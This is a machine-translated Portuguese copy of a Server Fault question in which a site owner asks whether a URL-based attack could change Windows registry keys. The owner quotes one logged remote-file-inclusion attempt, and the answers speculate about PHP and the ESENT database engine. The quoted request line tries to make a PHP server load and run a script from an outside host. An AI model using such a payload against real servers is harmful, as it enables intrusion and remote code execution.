As chaves de registro podem ser alteradas por meio de URLs do servidor da web?

Question

As chaves de registro podem ser alteradas por meio de URLs do servidor da web?

#1 resposta do (1 votos)
#2 resposta do (0 votos)
#3 resposta do (0 votos)

3

Então, eu estava navegando pelos logs de acesso ao meu site recentemente e notei várias tentativas de fazer coisas como essa

?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??

Claro, eu não sou completamente estúpido e isso não afetou meu servidor ou o software, mas pensei que, para o inferno, eu veria o que está realmente nesse domínio. Quando carregado, o Chrome tentou alterar uma chave de registro de acordo com o Comodo. Existe alguma maneira de realmente alterar uma chave de registro do código que um navegador executa ou foi uma coincidência incomum que o Chrome, pela primeira vez que vi, tentou alterar uma chave do Registro.

Editar: 4 tentativas de modificação foram feitas de chaves diferentes em HKLM / SYSTEM / ControlSet001 / Services / ESENT

hacking web-server windows-registry

por Alex S 31.07.2009 / 10:51

3 respostas

0

O _SERVER[DOCUMENT_ROOT] me faz pensar que está tentando mudar o que o PHP acredita que o document root do servidor é para executar o PHP no arquivo vinculado. Eu não sabia que você poderia fazer isso, mas talvez haja um exploit em alguma versão específica do PHP?

É possível que o Chrome modifique as chaves de registro com ou sem a visita da URL e que não esteja relacionado?

por 01.08.2009 / 19:42

0

O Chrome tem armazenamento incorporado (Google Gears). É possível que ele esteja tentando armazenar seu banco de dados local no registro?

por 01.09.2009 / 18:01

Tags hacking web-server windows-registry

O controlador HP SmartArray 410i está lento? Permissões NTFS do DFS-R não está funcionando?

score 1 · Accepted Answer

~~Eu diria que foi uma coincidência, embora buracos de segurança inteligentes também não possam ser descartados. Pode ser útil se você nos informou qual era a chave do registro.~~

OK, vejo sua edição. (E por que Jeff alterou a chave de registro?) Deixe-me reformular - podemos descobrir quais chaves de registro exatas elas eram e quais valores exatos definiram?

De qualquer forma, o ESENT acaba sendo um dos mecanismo de banco de dados interno no Windows.

Agora, é possível que a página da Web tenha usado alguma falha de segurança no Chrome e, por meio dela, tenha tentado seqüestrar o ESENT para obter controle total do sistema. Soa bastante lógico.

Também é possível que o Chrome (ou algum plugin dele - digamos, um player de vídeo) tenha usado o ESENT de forma legítima, e foi o próprio ESENT que desejou alterar algumas das chaves de registro.